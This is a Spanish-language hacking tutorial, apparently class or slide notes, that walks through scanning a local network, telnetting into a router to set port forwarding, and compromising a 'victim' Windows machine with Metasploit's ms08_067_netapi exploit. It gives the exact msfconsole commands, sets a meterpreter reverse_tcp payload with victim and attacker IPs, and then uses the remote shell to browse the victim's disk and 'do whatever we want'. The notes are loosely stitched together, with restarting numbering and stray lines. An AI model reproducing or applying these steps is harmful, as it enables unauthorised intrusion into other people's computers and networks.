1. Los puertos comunes como FTP (21) y HTTP (80) frecuentemente están bien
protegidos y posiblemente sean vulnerables solo con acciones todavía por descubrir.
Trata otros puertos TCP y UDP que puedan olvidarse, como Telner y varios
puertos UDP que se dejan abiertos para jugar por LAN.
Un puerto 22 abierto es usualmente evidencia de un servicio SSH (secure shell)
en el objetivo, que algunas veces puede ser forzado abruptamente.
Para vulnerar la seguridad
1. Se vulnera la seguridad de una red puede ser WLAN_XXXX, CASA, HOGAR, etc.
2. Luego se escanea la red con IPSCAN, para luego designar una ip.
3. Luego se abre el cmd, y se ejecuta el siguiente comando.
2. Ejecute netstat con la opción -a para visualizar todas las conexiones
activas en el sistema, tanto TCP como UDP:
3. Con la herramienta PORT SCANNER, se ingresa la IP de uno de los
usuarios de la red para luego escanear que puertos están abiertos, y
examinar la manera de vulnerar.
4. PUERTOS ESCANEADOS:
80/TCP: HTTP HyperText Transfer Protocol (Protocolo de
Transferencia de HiperTexto) (WWW).
139/TCP: NetBIOS Servicio de sesiones
445/TCP: Microsoft-DS (Active Directory, compartición en Windows,
gusano Sasser, Agobot) o también es usado por Microsoft-DS
compartición de ficheros.
5. ENTRAR DESDE TELNET:
Abres una sesión TELNET desde
Inicio>Ejecutar. En la ventana, desde el
símbolo de comandos, tecleas
telnet XXX.XXX.XXX.XXX
donde las X representan la IP del router, es
decir, la puerta de enlace. Por ejemplo:
telnet 192.168.1.1
A continuación, se te solicitará la contraseña
del router para acceder a su menú de
configuración.
Creo que es eso lo que necesitas.
Ahora introducimos el comando set naptserver:
Transport protocol [tcp udp gre ]: (para elegir el
protocolo entre estos 3) en el ejemplo TCP
Service [name or port number]: Podemos introducir el
número de puerto. En el ejemplo 4000
Server IP Address [self or IP address]: Aquí
introducimos la ip privada del pc que vaya a hacer de
servidor de nuestra aplicación. En el ejemplo
192.168.1.199 (hay que borrar primero self, que sale
puesto)
6. USANDO ZENMAP:
Cuando descargues Nmap, también puedes descargar "Zenmap GUI" junto con él. Ábrelo una vez que lo
encuentres, coloca el Protocolo de Internet (IP) de la computadora que quieres hackear en el campo "Objetivo".
Digamos que quieres escanear un rango de direcciones IP, entonces tendrías que escribir la dirección IP inicial
seguido de (sin espacios) un guión (-) y el final de la última dirección IP. Por ejemplo, si quieres escanear
192.168.1.100 a 192.168.1.299, entonces deberías escribir 192.168.1.100-299. En el menú del "Perfil" de
Zenmap selecciona "exploración intensa" si no está seleccionado. Haz clic en el Explorador y el programa
escaneará la computadora o dispositivo de los puertos abiertos. Mira el Nmap de salida hasta que veas algunas
palabras en verde. Estos son los puertos abiertos en el equipo o dispositivo. Si el puerto 23 está abierto, el
dispositivo podrá hackearse si no tiene ninguna contraseña definida.
7. UTILIZANDO METAXPLOIT
Un puerto TCP/IP abierto por defecto en el sistema operativo puede
permitir a un usuario ingresar facilmente a su sistema si
autorizacion nos puede llegar a consumir 100% de los recurso del
equipo y dejar destrozos o hasta dejar fuera de funcionamiento
Se necesita una pc con backtrack.
Lo siguiente tenemos que ver si nuestra victima tiene habilitado el
puerto 445 #nmap -sS -sP 192.168.1.26
como lo tiene abilitado empezaremos hacer el trabajo de conexión
con metasploit
#msfconsole
buscamos el exploit que usaremos
#search /windows/smb/ms
#use exploit/windows/smb/ms08_067_netapi
ahora hay que asignar la direccion de la victima y la nuestra
> set payload windows/meterpreter/reverse_tcp
> set rhost 192.168.1.26 (ip de victima)
> set lhost 192.168.1.28 (nuestra ip)
> exploit ------>ejecutamos el exploit
8. ahora escribimos shell para ingresar al cmd de nuestra victima
>shell
cd ..
cd ..
hicimos dos cd .. para quedar ubicados en el disco duro C:
hacemos un dir para saber que tiene en el disco duro
y hacemos lo que queramos ahora crear carpetas, apagar el
equipo, etc.
9. Habiendo decidido el puerto queda por saber el
exploit que usaremos. Consultando la
documentación de Metasploit vemos que para el
puerto 445/tcp existen varios exploits. También
puede verse una lista de los exploits disponibles
por medio del comando show exploits. En mi caso
me quedaré con el
siguiente: windows/smb/ms08_067_netapi.
Ahora seleccionamos el payload que inyectaremos.
Podemos ver los payloads compatibles con el
exploit seleccionado con el comando show
payloads.
Seleccionaremos el
payload windows/shell_bind_tcp, que nos abre
una shell.
EJECUTADO PAYLOADS:
Ahora nos queda ver el resto de parámetros
necesarios antes de ejecutar el ataque. Para ello
tenemos el comando show options
Podemos ver como de todos los parametros a introducir tan
solo hace falta especificar uno: RHOST que como bien se indica
corresponde a la IP de la víctima (the target address).